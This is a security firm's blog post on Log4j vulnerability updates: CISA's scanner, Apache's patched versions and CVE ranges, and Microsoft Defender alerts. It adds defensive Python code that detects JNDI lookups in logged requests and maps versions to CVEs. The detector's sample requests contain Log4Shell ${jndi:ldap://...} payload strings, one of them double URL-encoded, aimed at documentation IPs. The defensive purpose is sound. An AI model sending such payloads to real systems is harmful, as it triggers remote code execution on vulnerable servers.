This article provides updates from The Cybersecurity and Infrastructure Security Agency (CISA), Apache and Microsoft who continue to work to develop patches and tools to help organizations protect themselves from one of the most severe cybersecurity vulnerabilities on record.
As many of us are just returning to the office from the holiday weekend, cybersecurity professionals around the globe continue to work around the clock to develop tools to identify and remediate Log4j vulnerabilities.
CISA Log4j Scanner Tool
CISA announced the release of a Log4j scanner last week that works to identify web services impacted by the CVE-2021-44228 and CVE-2021-45046 remote code execution vulnerabilities.
The open-sourced tool is based on scanners created by other members of the open-source community, including FullHunt’s automated scanning framework for the CVE-2021-44228 bug. According to CISA, the tool allows security teams to scan network hosts for Log4j RCE exposure and identify web application firewall bypasses that act as entry points for threat actors to potentially gain code execution within the environment. Its listed capabilities include:
Fuzzing for more than 60 HTTP request headers (not only the 3-4 headers covered by previously seen tools)
Fuzzing for HTTP POST Data parameters
Fuzzing for JSON data parameters
Supports DNS callback for vulnerability discovery and validation
WAF Bypass payloads
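The defender’s mirror of the scanner’s approach is to inspect the same surface in your own web traffic: every header, query parameter, form field and JSON field a request carries, not just the URL. The check below is an added example written for this article, not code from CISA or FullHunt; the request records, log layout and sample values are constructed, and the hypothetical `classify()` function returns a verdict plus the location of the first finding.

```python
import json
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

LOOKUP = re.compile(r"\$\{[^}]*\}")          # any Log4j ${...} lookup string
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)  # the lookup CVE-2021-44228 requires

def decode(value, rounds=3):
    """URL-decode a few times so double-encoded braces compare in plain form."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def fields(req):
    """Yield (location, value) for each request part an application might log."""
    url = urlsplit(req["url"])
    yield "path", url.path
    for k, v in parse_qsl(url.query, keep_blank_values=True):
        yield f"query:{k}", v
    for k, v in req.get("headers", {}).items():
        yield f"header:{k}", v
    body = req.get("body", "")
    try:                                      # JSON POST data parameters
        for k, v in json.loads(body).items():
            yield f"json:{k}", str(v)
    except (ValueError, AttributeError):      # otherwise form-encoded POST data
        for k, v in parse_qsl(body, keep_blank_values=True):
            yield f"form:{k}", v

def classify(req):
    """Return ('jndi' | 'lookup' | 'clean', location of the first finding)."""
    verdict = ("clean", None)
    for where, raw in fields(req):
        value = decode(raw)
        if JNDI.search(value):
            return "jndi", where
        if verdict[0] == "clean" and LOOKUP.search(value):
            verdict = ("lookup", where)       # other lookups: worth a manual look
    return verdict

# Constructed sample requests: benign, lookup in a custom header, double
# URL-encoded lookup inside a JSON body parameter (documentation IPs only).
SAMPLE = [
    {"url": "/search?q=log4j", "headers": {"User-Agent": "Mozilla/5.0"}},
    {"url": "/login", "headers": {"X-Forwarded-For": "${jndi:ldap://198.51.100.7/a}"}},
    {"url": "/api", "body": '{"name": "%2524%257Bjndi%253Aldap%253A%252F%252F203.0.113.9%252Fx%257D"}'},
]
```

Run `classify()` over each parsed request from your access or application logs; a `jndi` verdict is a direct CVE-2021-44228 attempt, while `lookup` flags any other `${...}` string reaching a logger for review.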
CISA also revised the “Alert (AA21-356A) Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” to include mitigation guidance for CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105 Log4j vulnerabilities. The revised alert is available at www.cisa.gov/uscert/ncas/alerts/aa21-356a.
Apache Fixes and Updates
Apache released Log4j version 2.17.1 this past Monday, which fixes a newly discovered remote code execution vulnerability (CVE-2021-44832). Prior to the release, version 2.17.0 was believed to be the safest release to upgrade to, but the new version is now recommended until the next release.
According to The Hacker News, Apache also released patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems. Apache has now addressed four key vulnerabilities, summarized in its updated notes below.
CVE-2021-44228 (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
CVE-2021-45046 (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)
CVE-2021-45105 (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)
CVE-2021-4104 (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)
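To turn the list above into an inventory check, the following added example (written for this article, not an Apache or CISA tool) maps a Log4j version string to the CVEs it lists. It encodes only the affected ranges stated above, including the 2.12.2 exclusion for CVE-2021-45046 and the 1.2 line for CVE-2021-4104; how you collect version strings (JAR manifests, SBOMs, package metadata) is assumed to happen elsewhere, and `applicable_cves()` is a hypothetical helper name.

```python
import re

def parse_version(v):
    """Turn '2.0-beta9', '2.12.2' or '1.2.17' into a comparable tuple.

    Pre-releases sort before the matching release, so 2.0-beta9 < 2.0.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {v!r}")
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    stage = {"alpha": 0, "beta": 1, "rc": 2, None: 3}[m.group(4)]
    return (major, minor, patch, stage, int(m.group(5) or 0))

# (CVE, first affected, last affected, explicitly excluded versions, fixed in)
# Ranges are exactly those the article lists; nothing else is assumed.
LOG4J2_RANGES = [
    ("CVE-2021-44228", "2.0-beta9", "2.14.1", (), "2.15.0"),
    ("CVE-2021-45046", "2.0-beta9", "2.15.0", ("2.12.2",), "2.16.0"),
    ("CVE-2021-45105", "2.0-beta9", "2.16.0", (), "2.17.0"),
]

def applicable_cves(version):
    """Return the CVE ids from the article that apply to this Log4j version."""
    pv = parse_version(version)
    if pv[:2] == (1, 2):
        # Log4j 1.2 line: CVE-2021-4104 has no fix; the article says upgrade to 2.17.1
        return ["CVE-2021-4104"]
    hits = []
    for cve, lo, hi, excluded, _fixed in LOG4J2_RANGES:
        if version.strip() in excluded:
            continue
        if parse_version(lo) <= pv <= parse_version(hi):
            hits.append(cve)
    return hits

if __name__ == "__main__":
    # Constructed sample of versions an inventory scan might turn up
    for v in ["2.0-beta9", "2.14.1", "2.15.0", "2.16.0", "2.17.1", "1.2.17"]:
        print(v, applicable_cves(v) or "none of the listed CVEs")
```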
Microsoft Defender for Containers
Microsoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105. Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster.
Microsoft Defender for Endpoint
Alerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. These alerts are supported on both Windows and Linux platforms:
Log4j exploitation detected – detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability
Log4j exploitation artifacts detected (previously titled Possible exploitation of CVE-2021-44228) – detects coin miners, shells, backdoor and payloads such as Cobalt Strike used by attackers post-exploitation
Log4j exploitation network artifacts detected (previously titled Network connection seen in CVE-2021-44228 exploitation) – detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity
Microsoft Defender for Servers
Microsoft Defender for Cloud’s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts.
However, reports of the tool capturing false positives started popping up on Twitter shortly after the release. Administrators reported receiving a message reading “Possible sensor tampering in memory was detected by Microsoft Defender for Endpoint”.
The Schneider Downs cybersecurity practice consists of experts offering a comprehensive set of information technology security services, including penetration testing, intrusion prevention/detection review, ransomware security, vulnerability assessments and a robust digital forensics and incident response team. For more information, visit www.schneiderdowns.com/cybersecurity or contact the team at [email protected].